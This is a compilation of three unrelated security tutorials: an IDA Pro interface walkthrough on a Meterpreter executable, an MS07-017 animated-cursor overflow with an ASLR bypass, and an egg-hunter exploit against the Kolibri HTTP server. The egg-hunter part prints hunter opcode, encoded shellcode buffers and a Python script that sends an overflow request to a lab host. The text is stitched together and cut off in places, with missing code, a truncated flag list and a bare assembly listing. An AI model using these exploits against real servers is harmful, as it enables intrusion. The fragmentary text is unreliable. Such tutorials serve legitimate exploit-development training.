• Don’t save the database: we can pick this option if we don’t want to save the changes
that we have made.
If we are using the demo version of IDA, we won’t be able to save our work, since that function
is disabled. If we want to use that option, we can either download IDA Pro 5.0, which is free
but outdated, or pay for our own IDA Pro version.
If we saved our work, we can open the database anytime later on and it will load really fast,
because it doesn’t need to perform the whole analysis of the executable file like the first time.
This saves us time and money when analyzing malicious files.
We need to keep in mind that whenever IDA analyzes the executable, it must do quite a lot of
work, like parsing the executable’s header (in our case, a PE executable header), parsing and
creating sections for various executable’s file sections that it may have (.data, .code, etc),
identifying the entry point of the executable where the code will start executing if we run it,
etc.
During that time, IDA will also load and parse the actual code instructions of the executable file
into the assembly instructions of the selected processor module. Those assembly instructions
are then also shown to the user for analysis. But IDA doesn’t stop there; it can also scan the
generated assembly instructions to figure out additional information about the executable, like
the compiler which was used to compile the executable, the function’s arguments, the
function’s local variables, etc.
All in all, IDA can be incredibly helpful in analyzing an executable by providing various
information that we normally would have had to figure out ourselves.
We can see the menu area that contains the menu items File, Edit, etc. This can be used to do
anything that is possible to do with IDA; it’s just a matter of finding the right option we would
like to do. A shortcut for various actions is the toolbar area that provides shortcuts for the
same actions we could find in the Menu itself. We can add and remove toolbars by using the
View – Toolbars menu option. The next thing is an overview navigator, which is also presented
on the picture below for clarity:
It represents the whole memory space used by the analyzed application. If we right-click on it,
we can zoom in and out to represent smaller chunks of memory. We can also see that different
colors are used for different parts of the memory; this depends on the type of data or code
being loaded into that area. At the very beginning of the navigator, we can see a very small
yellow arrow that points to the location where we’re currently at in the disassembly window.
On the picture below, we’re presenting the different views on the gathered data. The data was
gathered on the initial analysis of the executable and now we’re merely asking IDA to return a
specific type of data in its own data view.
We can see that there are a lot of data views available and all of them contain one or more
specific information that was gathered from the loaded executable. To open a specific data
view, we can go to View – Open Subviews and choose the appropriate view we would like to
show. We can also switch back to the default view by clicking on Windows – Reset desktop.
The main view is the disassembly window where we can see the actual disassembled code of
the analyzed executable. We can switch between the graph and the listing view that actually
represents the same program. The graph view can be used if we want to quickly figure out the
execution flow of the current function and the listing view can be used when we want to see
the actual assembly instructions.
The graph overview of the Meterpreter executable is presented on the picture below:
This is just an overview of the program that makes it easier to navigate to the piece of code
we would like to analyze. In the picture above, we clicked on the start of the program (note
the dotted rectangle). Because this is only the graph overview, we can’t see the actual
disassembled code. That code is shown in a companion window, the graph view, which displays
the disassembly for the region selected in the graph overview, as shown on the picture
below:
On the left side is a window presenting the actual disassembled code of the beginning of the
program. On the right, we can see the overview graph presenting the same beginning of the
program. On the graph overview, the program is broken down into logical blocks, where each
block is presenting a jump target (as defined in the assembly code). From the graph overview
we can also see the logic the program uses while executing. In our case, we can see that there
are no decision branches and the program is executed from start to finish without any
decisions. The arrows between the blocks can be green, red or blue. In our case, all of the
arrows are blue because there’s no branching being done. If the program makes a decision at
some point and execution can follow one of two branches, a green arrow marks the branch
taken when the condition is true and a red arrow marks the branch taken when it is false.
The graph overview always presents the whole current function of the program,
which makes it easy to go to a specific point in the program if the program is overly
complicated and the navigation in the listings view becomes difficult.
The listing view of the Meterpreter executable is presented on the picture below:
Let’s also present another listing window that has a little more going on than the one on the
picture above.
We can switch between different locations in listing view or within the graph view; both of the
views will represent the same code at any given time. If we look at the graph and the listings
view more carefully, we can see that the listings view also presents the virtual addresses
where certain instructions are located, while the graph view hides those. This is because the
graph view can be presented more clearly with less information, so virtual addresses are
hidden. Nevertheless, if we would like to show those addresses, we can enable them in
Options – General – Disassembly and enable the “Line prefixes” option. Those preferences can
be seen on the picture below:
On the left side of the listing window, we can see different arrows that show us the branching
in the analyzed program. On the line 0x0040134B, we can see the program will jump to the
location 0x00401337 and continue the execution from there.
The arrows are of different colors and can be solid or dashed. The solid lines represent
unconditional jumps, while the dashed lines represent conditional jumps. In our example, the
red line is solid, because the instruction located at that address uses the unconditional
instruction jmp.
IDA Pro can also figure out the arguments of the function in question. We can’t see any
function parameters on the picture above but we can see the comments noted with a ‘;’ at the
end of some of the lines. Each of the comments lets us know that another instruction is
referencing that place in the code. In our case, we can see a cross-reference comment “; CODE
XREF: .text:0040134B”, which lets us know that the instruction at address 0x0040134B is
referencing the current address. So though we already know that the program is jumping from
location 0x0040134B to 0x00401337, we often won’t be able to tell so easily, which is why the
cross-references can be very helpful.
When viewing the instructions in graph mode afterwards, the virtual addresses will be
enabled. This can be seen on the picture below where we presented the same picture as
above, just with virtual addresses enabled:
In the IDA’s default window, there’s an additional window that is used to display different
messages generated by IDA. Those messages can be outputted by any kind of plugin in IDA or
by IDA itself. The messages are there to inform us of different things regarding the analysis of
the executable sample. For clarity, the message view is presented below:
Other views
If we go inside View – Open Subviews, we can see many windows that can be shown or hidden
and provide us with additional functionality. These can be seen on the picture below:
If we go inside the Windows menu option, we can see the currently open windows which we
can quickly bring to the front by using the Alt-Num shortcut, where Num is a number. The
currently open windows can be seen on the picture below with their appropriate shortcuts:
IDA View-A
We already presented IDA View-A, which is simply the code disassembly of the program.
Hex View-A
The hex view window presents the hex representation of the program. The first hex window is
always synchronized with the disassembly view, so it always presents the same virtual
addresses. If some bytes are highlighted in either one of the windows they are also highlighted
in the other window as well.
Let’s first select some text in the IDA View-A. On the picture below, we selected the text “Send
request failed!”:
The corresponding Hex View-A will have the same text selected, as can be seen below:
If we right-click on the Hex View-A, we can also disable the synchronization of the hex view
with the disassembly view. That functionality can be seen on the picture below:
Exports
The Exports window lists the exported functions that can be used by outside files. Exported
functions are most common in shared libraries as they provide the basic building block APIs
that can be used by programs running on the system to do basic operations. In our case, there
is only one export function named start, which is the executable’s entry point.
Imports
The Imports window lists all of the functions that the executable calls that are not contained in
the executable itself. This is a common scenario present when the executable is using shared
DLLs to do its job. The Meterpreter executable contains the following imported functions:
The imports window lists the virtual address of the function, its name, and the DLL to which
it belongs.
We need to keep in mind that the imports window lists only those functions that the loader
resolves through the import table when the executable is loaded. An executable can also
resolve functions by itself at run time with calls such as LoadLibrary and GetProcAddress,
and those functions won’t appear in this window.
Names window
The names window displays all the names found within the executable program. A name is
simply an alias for a certain virtual address. Usually, each referenced location in the executable
will have a name. Referenced locations are named locations where we transfer the execution
at branch/call time and also the variables, where we read the data from or write the data to. If
there are symbols contained in the executable’s symbol table, they are appended to the list in
the Names window.
Throughout the disassembled code, we can also notice names that do not appear in the names
window; those are automatically generated by IDA itself. This happens because the symbol
table in the executable doesn’t contain a symbol for that location, so there is no name IDA
could inherit.
The automatically generated names usually have one of the following prefixes followed by
their corresponding virtual address: sub_, loc_, byte_, word_, dword_ and unk_.
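The naming scheme is simple enough to sketch in Python. The helper names below (auto_name,
address_from_name) and the kind labels used as dictionary keys are our own; only the prefixes
come from the list above.

```python
# Prefixes IDA uses for automatically generated names, keyed by a label of our own.
AUTO_PREFIXES = {
    "function": "sub_",
    "code": "loc_",
    "byte": "byte_",
    "word": "word_",
    "dword": "dword_",
    "unknown": "unk_",
}

def auto_name(kind: str, address: int) -> str:
    """Build a generated name: prefix followed by the address in uppercase hex."""
    return "%s%X" % (AUTO_PREFIXES[kind], address)

def address_from_name(name: str) -> int:
    """Recover the virtual address encoded in a generated name."""
    prefix, _, hex_part = name.rpartition("_")
    if prefix + "_" not in AUTO_PREFIXES.values():
        raise ValueError("not an automatically generated name: %r" % name)
    return int(hex_part, 16)
```

For example, auto_name("code", 0x401337) gives "loc_401337", and address_from_name turns that
string back into the address we can jump to.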
We can use names to quickly jump to various locations inside the program executable without
having to remember their corresponding virtual addresses. The names window for the
Meterpreter executable can be seen on the picture below:
Let’s take a look at the start name that points to the 0x004012A7 virtual address location. Also,
take a look at the same memory location in the disassembly view; we can see that the start
name is indeed located at the specified location as can be seen on the picture below:
We also need to mention different colors and letters present in each line in the Names
window. Different letters mean the following [1]:
• L (Library): library function that can be recognized with different signatures that are
part of IDA. If the matching signature is not found, the name is labeled as a regular
function.
• I (Imported): imported name from the shared library. The code from this
function/name is not present in the executable and is provided at run time, whereas
the library function is embedded into the executable.
• C (Code): named code that represents program locations that are not part of any
function, which can happen if the name is a part of the symbol table, but the
executable never calls this function.
In the Meterpreter executable, we can see that the start name is a regular function, which
means it’s an actual function in the executable. There are also quite a lot of ASCII strings
represented by the letter A. This is normally the case for every executable, since each
executable must contain its share of strings. But the Meterpreter executable also uses
imported (I) entries that correspond to the imported library functions, which are also needed if
we want to call functions outside of the executable (located in shared libraries).
Functions window
The functions window lists all the functions present in the executable, even those whose
names were automatically assigned by IDA itself. The names window doesn’t do that by default
and it also displays other names. The functions window is used solely to display the names of the
functions. On the picture below, we can see all the functions used in the Meterpreter reverse
executable:
We can see that the function start is located in the .text segment of the executable, that it
starts at the 0x004012A7 virtual address, is 0x9D bytes long, and returns to the caller (flag R).
The explanation of all of the flags can be found if we right-click on the function on the function
window and select “Edit function.” The window presented on the picture below will pop up
showing the explanation of the flags:
The flags are explained as follows:
– R: whether the function returns to the caller
Strings window
The strings window presents the strings that were found in the executable. Keep in mind that
every time we open the strings window, IDA rescans the whole binary and displays them; it
doesn’t keep them stored in one of the database archives. We can see the strings window with
the strings found of the Meterpreter executable on the picture below:
We can control which strings will be presented to us by right-clicking on the strings window
and choosing Setup, where we can change various settings that correspond directly to how IDA
searches for strings. The setup window can be seen on the picture below:
We can see that IDA can scan for various kinds of strings, but scans for C 7-bit strings by
default. On the picture above, we can also see that the minimum length of the string for it
to be displayed in the strings window is 5 characters. We will often find ourselves changing
the “allowed string types” to scan for other strings as well, which is good if we have a
hunch that the executable uses other kinds of strings.
The “display only defined strings” option will cause IDA to display only named strings and hide
all the others. If we enable “ignore instructions/data definitions,” IDA will also scan for strings
in the code and data sections of the executable. This is a good option if we want to find out if
there are any strings embedded in the actual code of the executable.
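A rough Python equivalent of the default scan (7-bit strings, minimum length 5) looks like
this. It is a simplified sketch: it ignores IDA's other string types and does not require a
terminating NUL, and the function name find_c_strings is our own.

```python
import re

def find_c_strings(data: bytes, min_len: int = 5):
    """Return (offset, text) pairs for runs of printable 7-bit ASCII bytes."""
    # 0x20-0x7E is the printable ASCII range; {n,} means "at least n bytes".
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]
```

Lowering min_len has the same effect as lowering the minimum length in the Setup dialog: more
hits, but also more noise from bytes that only happen to be printable.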
Structures
The structures window lists the data structures that could be found in the binary. IDA uses the
functions and their known arguments to figure out whether there’s a data structure present in
the executable or not. In the case of the Meterpreter reverse executable, IDA didn’t find any
structures in the executable, which can be seen on the picture below:
Whenever IDA finds a structure, we can examine it by double-clicking on it. Of course, we can
also check out the data structure on the Internet, but why would we do that if IDA already
provides us with the information we need?
Enums
The enums window lists all the enum data types found in the executable. In the case of reverse
Meterpreter executable, IDA didn’t find any enum data types as can be seen on the picture
below:
Segments
The segments window lists all the sections of the binary. In the case of reverse Meterpreter,
the sections are presented on the picture below:
We can see four sections here: .text, .idata, .rdata and .data. The .text section starts at virtual
address 0x00401000 and ends at the virtual address 0x0040C000. The R/W/X columns are flags
that mean: Read/Write/eXecute. The .text section has the Read and eXecute flags set, which is
mandatory for the executable to be able to actually execute. It would be worrying if the
.text section also had the Write flag set, which would indicate the possibility of
self-modifying code that is common in viruses and worms.
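In the PE file itself, the R/W/X columns come from the Characteristics field of each section
header. The sketch below decodes the three memory flags and flags sections that are both
writable and executable; the constant values are the documented IMAGE_SCN_MEM_* bits, while
the helper names are our own.

```python
# Memory-permission bits of a PE section header's Characteristics field.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def rwx(characteristics: int) -> str:
    """Render the flags the way the segments window shows them, e.g. 'R-X'."""
    return "".join([
        "R" if characteristics & IMAGE_SCN_MEM_READ else "-",
        "W" if characteristics & IMAGE_SCN_MEM_WRITE else "-",
        "X" if characteristics & IMAGE_SCN_MEM_EXECUTE else "-",
    ])

def is_writable_and_executable(characteristics: int) -> bool:
    """True for sections that could hold self-modifying code."""
    mask = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return characteristics & mask == mask
```

A typical .text section has Characteristics 0x60000020, which rwx renders as "R-X".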
Signatures
Signatures are used to determine the compiler used for the executable by comparing many
known compiler-specific signatures to the current executable. IDA will try to apply all of
the signatures taken from one of the files in the sigs directory to the executable.
The useful thing about signatures is that the functions will already be recognized and we won’t
need to reverse engineer the standard functions that are already known, so we can focus more
on the actual reversing of the program itself. In the case of reverse Meterpreter executable,
IDA isn’t able to determine the compiler used to compile the executable, so the warning below
is shown:
We can click on the “Add signature now” button to select the signatures we would like to
forcibly apply to the executable. A list of available library modules can be seen below:
Conclusion
IDA Pro is a very good disassembler that should be used in every reverse engineering scenario.
We’ve seen the basic windows that IDA Pro uses and introduced them on the reverse
Meterpreter executable. If we want to master IDA Pro, it’s better to completely understand
what we’ve written in this tutorial before moving on to the more advanced stuff.
https://resources.infosecinstitute.com/topic/basics-of-ida-pro-2/
The vulnerability lies in the way ANI headers are handled in Windows. So what are ANI
files? ANI files are animated mouse cursors that are used by Windows. These files follow
the RIFF file format that was developed by IBM and Microsoft. I’m not going to delve into
the details of how RIFF works; I will keep it limited to the knowledge we need.
The RIFF file format stores data in chunks. For ANI files, there are mainly two types of
chunks: anih and LIST. The anih (ANI Header) chunk stores the metadata about the file
and LIST stores the actual data. Here is an example of an animated cursor:
ANI File Format
After the anih chunk, there is a LIST chunk (like the anih chunk, its size is stored in the
next 4 bytes and its data follows), but we are interested in anih chunks only. If you want to
know what data is stored in the ANI header (the purple part), you can look at the “Structure
of the ‘anih’ header chunk” section here. Enough background for now.
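The chunk layout described above (4-byte identifier, 4-byte little-endian size, then the
data) can be walked with a few lines of Python. This is a minimal sketch of generic RIFF
parsing, not the Windows implementation, and the function name iter_riff_chunks is our own.

```python
import struct

def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each top-level chunk of a RIFF file."""
    if data[:4] != b"RIFF":
        raise ValueError("not a RIFF file")
    (riff_size,) = struct.unpack_from("<I", data, 4)
    # Bytes 8..11 hold the form type, b"ACON" for animated cursors.
    pos, end = 12, min(len(data), 8 + riff_size)
    while pos + 8 <= end:
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        yield chunk_id, data[pos + 8:pos + 8 + size]
        # Chunks are padded to an even length.
        pos += 8 + size + (size & 1)
```

Running list(iter_riff_chunks(ani_bytes)) on a normal cursor should show one 36-byte anih
chunk followed by the LIST data.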
The Vulnerability
Windows uses the function LoadCursorIconFromFileMap to load ANI files. Originally it didn’t
validate the size of anih chunks, so anything above 36 bytes led to an overflow; Microsoft
fixed this in MS05–002. In the patch, the function started validating the anih header size
to make sure it is exactly 36 bytes. Unfortunately, it only validated the first anih chunk.
The researcher who found this vulnerability released a PoC ANI file which replicates this
overflow:
(You can use this python script to create this file yourself)
MS07–017 PoC ANI file
In this PoC we can observe two anih chunks. The first one is a perfectly valid, healthy
36-byte chunk. The second is a fat 88-byte (0x58) anih chunk that will lead to an overflow.
For those of you who are wondering why we have random nulls in the second chunk, read the
comments in lines 476–488 of the Metasploit module for this vulnerability.
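The gap in the patch is easy to model. The sketch below is our own simplification of the
check logic (it is not the Windows code): one function looks only at the first anih chunk,
as the incomplete fix did, and the other checks every anih chunk. The sample file is filled
with zero bytes and only mimics the 36/88-byte layout of the PoC.

```python
import struct

ANIH_SIZE = 36  # the only size the patched code accepts for an anih chunk

def anih_sizes(data: bytes) -> list:
    """Return the declared size of every anih chunk after the RIFF/ACON header."""
    sizes, pos = [], 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        if chunk_id == b"anih":
            sizes.append(size)
        pos += 8 + size + (size & 1)
    return sizes

def first_chunk_only_check(data: bytes) -> bool:
    """Models the incomplete fix: only the first anih chunk is validated."""
    sizes = anih_sizes(data)
    return not sizes or sizes[0] == ANIH_SIZE

def every_chunk_check(data: bytes) -> bool:
    """Validates all anih chunks, which closes the gap."""
    return all(size == ANIH_SIZE for size in anih_sizes(data))

def chunk(chunk_id: bytes, payload: bytes) -> bytes:
    return chunk_id + struct.pack("<I", len(payload)) + payload

# Harmless stand-in with the same chunk sizes as the PoC (36 bytes, then 0x58 bytes).
body = b"ACON" + chunk(b"anih", bytes(36)) + chunk(b"anih", bytes(0x58))
poc_like = b"RIFF" + struct.pack("<I", len(body)) + body
```

With this file, first_chunk_only_check(poc_like) passes while every_chunk_check(poc_like)
fails, which is exactly the difference the second anih chunk exploits.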
But how will we deliver this payload? We have to make Windows load this ANI file. There are
multiple ways of doing that, but the best-case scenario is to deliver the ANI file to the
system remotely. That way we get remote code execution! We can make the victim open a
malicious webpage, since webpages can define custom cursors, or we can send an
HTML-formatted mail to the victim. All you have to do is create a webpage with the following
code:
The exploitation
So we have 43434343 written in EIP. How about finding a JMP ESP now? But hold your horses.
We have ASLR enabled here in Windows Vista. Even if we find an address to JMP ESP, it’ll get
changed after we restart the system. Right… RIGHT? Well, sort of. The address indeed will
change, but only the first two bytes. Here’s an example:
ASLR in action
Note the address of JMP ESP in the first image, and then look at it in the second image. You
can see the difference ASLR makes: only the first two bytes change while the last two stay
constant. Because x86 stores values in little-endian order, our overflow overwrites the
saved EIP starting with its fourth (least significant) byte, then the third, then the second
and finally the first. This means that if we overwrite only two bytes of EIP, we overwrite
the last two bytes. Let’s replicate this first. We will modify our PoC to overwrite EIP with
only 4343, not 43434343.
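The effect of a partial overwrite can be checked with a small Python model. The saved
address 0x77B51234 used in the usage note is a made-up value inside the 77B5XXXX range, and
the function name partial_overwrite is our own.

```python
import struct

def partial_overwrite(saved_eip: int, data: bytes) -> int:
    """Overwrite the lowest-addressed bytes of a little-endian 32-bit value."""
    raw = bytearray(struct.pack("<I", saved_eip))  # bytes in memory order
    n = min(len(data), 4)
    raw[:n] = data[:n]                             # the overflow writes upward from here
    return struct.unpack("<I", bytes(raw))[0]
```

partial_overwrite(0x77B51234, b"\x43\x43") keeps the randomized upper half and yields
0x77B54343. Writing b"\x0b\x70" instead gives 0x77B5700B, so the two bytes we control must be
supplied low byte first.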
Modified PoC
Note that I have modified the sizes of the RIFF and second anih chunks too (highlighted in
yellow). After using this ANI file, this is the overwrite we get:
So we start searching the 77B5XXXX range for JMP ESP, but no luck. Looking at other registers,
we do have a JMP [EBX] instruction in the range:
JMP [EBX]
And EBX looks interesting too. It holds the address of a pointer to the beginning of our ANI
file. In the Registers pane, we see that EBX holds the value 02BFF0EC, which points to the
value 02D50000. In the dump, we can see that 02D50000 points to our ANI file. If we look at
our file as instructions in the Instructions pane, “RIFF” converts to weird (but safe)
instructions.
Before proceeding further let’s verify whether our theory of jumping to the beginning of our
ANI file works. We can safely replace the 4 bytes after “RIFF” with anything, so let’s put
an INT3 instruction there. Here is what our ANI file looks like:
(Code for creating this file is here)
ANI file to verify JMP [EBX]
EIP will be overwritten with 700b, which should point to JMP [EBX]. Let’s put a breakpoint
at this instruction to verify.
The JMP [EBX]
As we can see here, we hit our breakpoint at JMP [EBX] and then started executing our ANI
file. But how and where do we put our payload? We can only use the 4 bytes after “RIFF”; we
cannot overwrite “ACON” or the anih chunk after that. What we can do is place our payload
after the valid anih chunk and put a short jump in the bytes after “RIFF” that jumps to the
payload. Currently, our ANI file looks like this:
Time for some venom! The code for generating our final ANI file:
https://medium.com/@notsoshant/windows-exploitation-aslr-bypass-ms07-017-8760378e3e84
Egg Hunters
Egg Hunters Introduction
From the previous parts we should already have an idea about how buffer overflows work. A
program stores a large buffer, at some point we hijack the execution flow, and we then
redirect control to one of the CPU registers that points to part of our buffer so that any
instructions there are executed. But ask yourself: what if, after we gain control, we don't
have enough buffer space for a meaningful payload? It may be the case that the particular
vulnerability is not exploitable, but that is unlikely. In this case you need to look for one
of two things: (1) the buffer space before overwriting EIP is also in memory somewhere and
(2) a buffer segment may also be stored in a completely different region of memory. If this
other buffer space is close by you can get there with a "jump to offset"; however, if it is
far away or not easily accessible we will need to find another technique (we could hardcode
an address and jump to it, but for reliability we should never do this).
Enter the “Egg Hunter”! The egg hunter is composed of a set of programmatic instructions
that are translated to opcode, and in that respect it is no different from any other
shellcode (this is important because it might also contain bad characters!). The purpose of
an egg hunter is to search the entire memory range (stack/heap/..) for our final stage
shellcode and redirect execution flow to it. There are several egg hunters available; if you
want to read more about how they work I suggest this paper by skape. In fact we will be using
a slightly modified version of one of these egg hunters; you can see its structure below.
loop_inc_page:
loop_inc_one:
loop_check:
loop_check_8_valid:
je loop_inc_page // Yes, invalid ptr, go to the next page
is_egg:
scasd // Compare the dword in edi to eax again (which is now edx + 4)
matched:
jmp edi // Found the egg. Jump 8 bytes past it into our code.
I won't explain exactly how it works; you can read skape's paper for more details. What you
need to know is that the egg hunter contains a user-defined 4-byte tag and searches through
memory until it finds this tag repeated twice (if the tag is "1234" it will look for
"12341234"). When it finds the tag it redirects execution flow to just after the tag and so
to our shellcode. If you have any need of an egg hunter in an exploit I highly suggest you
use this one (it is also implemented in !mona, but more about that later) because of its
small size (32 bytes), its speed and its portability across Windows platforms. You can see
the egg hunter below after it has been converted to opcode.
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
The tag in this case is "b33f"; if you use an ASCII tag you can easily convert it to hex with
a quick google search... In this case we will need to prepend our final stage shellcode with
"b33fb33f" so that the egg hunter can find it.
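The 32 bytes can be read instruction by instruction. The annotated Python sketch below
rebuilds the same opcode for an arbitrary 4-byte tag and models the "tag repeated twice"
search on a plain byte string. The helper names build_hunter and find_egg are our own, and
find_egg is a simplification: the real hunter walks memory page by page and skips pages it
cannot read.

```python
def build_hunter(tag: bytes) -> bytes:
    """Return the 32-byte egg hunter with the given 4-byte tag embedded."""
    if len(tag) != 4:
        raise ValueError("the tag must be exactly 4 bytes")
    return (
        b"\x66\x81\xca\xff\x0f"  # or   dx, 0x0fff    ; move to the end of the page
        b"\x42"                  # inc  edx           ; next address to test
        b"\x52"                  # push edx
        b"\x6a\x02"              # push 2             ; system call number
        b"\x58"                  # pop  eax
        b"\xcd\x2e"              # int  0x2e          ; ask the kernel to probe the pointer
        b"\x3c\x05"              # cmp  al, 5         ; access violation?
        b"\x5a"                  # pop  edx
        b"\x74\xef"              # je   loop_inc_page ; invalid page, skip it
        b"\xb8" + tag +          # mov  eax, <tag>
        b"\x8b\xfa"              # mov  edi, edx
        b"\xaf"                  # scasd              ; first copy of the tag?
        b"\x75\xea"              # jnz  loop_inc_one
        b"\xaf"                  # scasd              ; second copy of the tag?
        b"\x75\xe7"              # jnz  loop_inc_one
        b"\xff\xe7"              # jmp  edi           ; run the code after the egg
    )

def find_egg(memory: bytes, tag: bytes) -> int:
    """Model of the search: offset just past the doubled tag, or -1 if absent."""
    hit = memory.find(tag * 2)
    return -1 if hit < 0 else hit + 8
```

build_hunter(b"b33f") reproduces the opcode shown above byte for byte. Requiring the tag
twice is what keeps the hunter from matching the single copy of the tag inside its own code.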
Before we continue to our own exploit I would like to show you what to do if the egg hunter
contains any bad characters. First we will need to write the 32 bytes to a binary file; to do
this you can use a script I wrote, "bin.sh", which you can find in the coding section. When
that is done we can simply encode it with msfencode. You can see an example of this below;
notice how the encoding affects the byte size.
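Before reaching for an encoder, a quick scan tells us whether one is needed at all. The
sketch below checks a byte string against the bad characters listed in the PoC comments for
this target; the function name find_badchars is our own.

```python
# Bad characters for this target, taken from the PoC comment block.
BADCHARS = b"\x00\x0d\x0a\x3d\x20\x3f"

def find_badchars(payload: bytes, badchars: bytes = BADCHARS) -> list:
    """Return (offset, byte value) for every bad character found in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]

hunter = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
          b"\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
```

For the "b33f" hunter the scan comes back empty, so for this particular list of bad
characters the raw 32 bytes can be used as they are.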
[>] Clean up
[>] Done!!
buf =
"\xd9\xcf\xd9\x74\x24\xf4\x5e\x33\xc9\xbf\x4d\x1a\x03\x02" +
"\xb1\x09\x31\x7e\x17\x83\xee\xfc\x03\x33\x09\xe1\xf7\xad" +
"\xac\x2f\x08\x3e\xed\xfd\x9d\x42\xa9\xcc\x4c\x7e\x4c\x95" +
"\xe4\x91\xf6\x4b\x36\x5e\x61\x07\xc2\x0f\x18\xfd\x9c\x3a" +
"\x04\xfe\x04"
buf =
"\xdb\xcf\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x43\x56\x6b\x31\x49\x5a\x6b\x4f\x46\x6f\x37" +
"\x32\x46\x32\x70\x6a\x44\x42\x42\x78\x5a\x6d\x46\x4e\x77" +
"\x4c\x35\x55\x32\x7a\x71\x64\x7a\x4f\x48\x38\x73\x52\x57" +
"\x43\x30\x33\x62\x46\x4c\x4b\x4a\x5a\x4c\x6f\x62\x55\x6b" +
"\x5a\x6e\x4f\x43\x45\x69\x77\x59\x6f\x78\x67\x41\x41"
That should be enough background information, time to get to the good stuff!!
So like I said before we will be bringing "Kolibri v2.0 HTTP Server" to its knees. To do this
we will embed our buffer overflow in an HTTP request. You can see our POC below, which should
overwrite EIP. If you decide to recreate this exploit just modify the IPs in the appropriate
places; also, 8080 is the default port, but it can be set to anything in Kolibri.
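#!/usr/bin/python
import socket
import os
import sys
Stage1 = b"A"*600
# Assumption: Stage1 is sent as the path of a HEAD request (the request line is not shown)
buffer = (
b"HEAD /" + Stage1 + b" HTTP/1.1\r\n"
b"Host: 192.168.111.128:8080\r\n"
b"Keep-Alive: 115\r\n"
b"Connection: keep-alive\r\n\r\n")
# Open a TCP connection to the target and send the request
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()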
As per usual we attach Kolibri to Immunity Debugger and execute our POC exploit. You can see
in the screenshot below that we overwrite EIP and that ESP points to part of our buffer. I
should note that if we send a longer buffer we can also overwrite the SEH; there are many
ways to skin a cat, as they say, but today we are hunting for eggs so let's continue.
Registers
Setting up Stage1
The attentive reader will have noticed that the buffer variable in our POC is called
"Stage1", more about "Stage2" later. Let's figure out the offsets to EIP and ESP. As usual we
will replace our buffer with the metasploit pattern and let !mona do the heavy lifting.
root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
!mona findmsp
Metasploit Pattern
Ok, so far so good. Based on this information we can reconstruct our buffer as shown below.
EIP will be overwritten by the 4 bytes that directly follow the first 515 bytes, and any
bytes that follow EIP will be located at the address ESP points to.
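The offset lookup that !mona performs can be reproduced in Python. This sketch regenerates
the cyclic pattern (uppercase letter, lowercase letter, digit) and searches it for the four
bytes that landed in a register. The function names mirror the Metasploit tools but the
implementation is our own, and the sample register value below was derived from the pattern
itself rather than read from the debugger.

```python
import string
from itertools import product

def pattern_create(length: int) -> str:
    """Generate the cyclic pattern Aa0Aa1Aa2... truncated to the given length."""
    out = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        out.append(upper + lower + digit)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]

def pattern_offset(value: int, length: int = 1000) -> int:
    """Offset of a 32-bit register value (stored little-endian) in the pattern, or -1."""
    needle = value.to_bytes(4, "little").decode("latin-1")
    return pattern_create(length).find(needle)
```

The pattern bytes at offset 515 are "1Ar2", which a register would hold as 0x32724131, so
pattern_offset(0x32724131, 600) returns 515.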
Pointer to ESP
Let's select one of these pointers and place it in our buffer. At this point I should explain
the purpose of "Stage1": we will embed our egg hunter here (we will worry about the final
stage shellcode later). Now there are a couple of options here. We could place our egg hunter
at ESP since we certainly have room there, but for the sake of neatness I would prefer to
